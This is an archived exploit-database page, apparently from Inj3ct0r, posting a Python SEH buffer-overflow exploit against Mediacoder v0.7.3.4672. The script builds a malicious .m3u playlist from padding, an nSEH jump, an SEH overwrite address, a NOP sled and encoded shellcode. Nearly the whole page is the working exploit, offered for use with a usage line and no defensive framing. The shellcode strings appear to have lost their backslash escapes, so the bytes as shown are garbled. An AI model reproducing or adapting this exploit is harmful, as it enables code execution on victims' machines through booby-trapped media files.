Home / os / win7

Mediacoder v0.7.3.4672 SEH Exploit

Posted on 31 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mediacoder v0.7.3.4672 SEH Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================
Mediacoder v0.7.3.4672 SEH Exploit
==================================


#!/usr/bin/python
from sys import argv
 
 
##################################################################
# Title: Mediacoder v0.7.3.4672 SEH Exploit
# Author: Stoke from devilc0de crew
# http://hack2web.altervista.org
# http://devilc0de.altervista.org
# Tested on: Windows XP SP2 ita
##################################################################
 
shell = (&quot;x89xe2xdbxcbxd9x72xf4x5bx53x59x49x49x49x49x49&quot;
&quot;x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a&quot;
&quot;x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32&quot;
&quot;x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49&quot;
&quot;x4bx4cx4ax48x4bx39x43x30x43x30x47x70x51x70x4f&quot;
&quot;x79x49x75x46x51x49x42x42x44x4ex6bx50x52x46x50&quot;
&quot;x4ex6bx43x62x44x4cx4ex6bx51x42x44x54x4cx4bx51&quot;
&quot;x62x44x68x46x6fx4ex57x51x5ax51x36x44x71x49x6f&quot;
&quot;x50x31x4fx30x4ex4cx45x6cx51x71x43x4cx43x32x46&quot;
&quot;x4cx45x70x4ax61x48x4fx46x6dx43x31x48x47x4dx32&quot;
&quot;x4ax50x42x72x46x37x4cx4bx43x62x46x70x4ex6bx51&quot;
&quot;x52x47x4cx45x51x48x50x4cx4bx51x50x50x78x4ex65&quot;
&quot;x49x50x50x74x51x5ax43x31x48x50x42x70x4cx4bx42&quot;
&quot;x68x45x48x4cx4bx43x68x45x70x46x61x48x53x4dx33&quot;
&quot;x45x6cx51x59x4ex6bx46x54x4ex6bx43x31x49x46x45&quot;
&quot;x61x49x6fx44x71x4bx70x4cx6cx4fx31x48x4fx44x4d&quot;
&quot;x46x61x4ax67x50x38x4dx30x42x55x49x64x46x63x51&quot;
&quot;x6dx4ax58x47x4bx51x6dx51x34x51x65x49x72x43x68&quot;
&quot;x4cx4bx42x78x51x34x46x61x4ex33x51x76x4ex6bx46&quot;
&quot;x6cx50x4bx4ex6bx43x68x47x6cx47x71x4ex33x4cx4b&quot;
&quot;x47x74x4cx4bx45x51x48x50x4dx59x43x74x47x54x51&quot;
&quot;x34x43x6bx43x6bx43x51x46x39x42x7ax50x51x4bx4f&quot;
&quot;x4bx50x43x68x51x4fx43x6ax4ex6bx45x42x48x6bx4e&quot;
&quot;x66x51x4dx51x7ax45x51x4ex6dx4ex65x48x39x43x30&quot;
&quot;x47x70x45x50x46x30x45x38x45x61x4cx4bx42x4fx4f&quot;
&quot;x77x4bx4fx49x45x4fx4bx48x70x48x35x4ex42x50x56&quot;
&quot;x50x68x4ex46x4ax35x4dx6dx4dx4dx4bx4fx4ax75x47&quot;
&quot;x4cx44x46x51x6cx46x6ax4dx50x49x6bx4dx30x43x45&quot;
&quot;x43x35x4fx4bx43x77x47x63x51x62x50x6fx42x4ax47&quot;
&quot;x70x50x53x49x6fx4ax75x45x33x50x61x42x4cx45x33&quot;
&quot;x44x6ex51x75x51x68x45x35x43x30x47x7ax41x41&quot;)
 
nops = &quot;x90&quot; * 30
seh = &quot;xCBx10x44x01&quot;
nseh = &quot;xebx06x90x90&quot;
evil = &quot;A&quot;*916 + nseh + seh + nops + shell
if len(argv) != 2:
    print &quot;[+] Usage: ./mediacoder_exploit &lt;filename.m3u&gt;&quot;
    quit()
  
fd = file(argv[1], &quot;w&quot;)
print &quot;[+] Writing %s&quot; % (argv[1])
fd.write(evil)
print &quot;[+] Exploit complete&quot;
fd.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-31]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP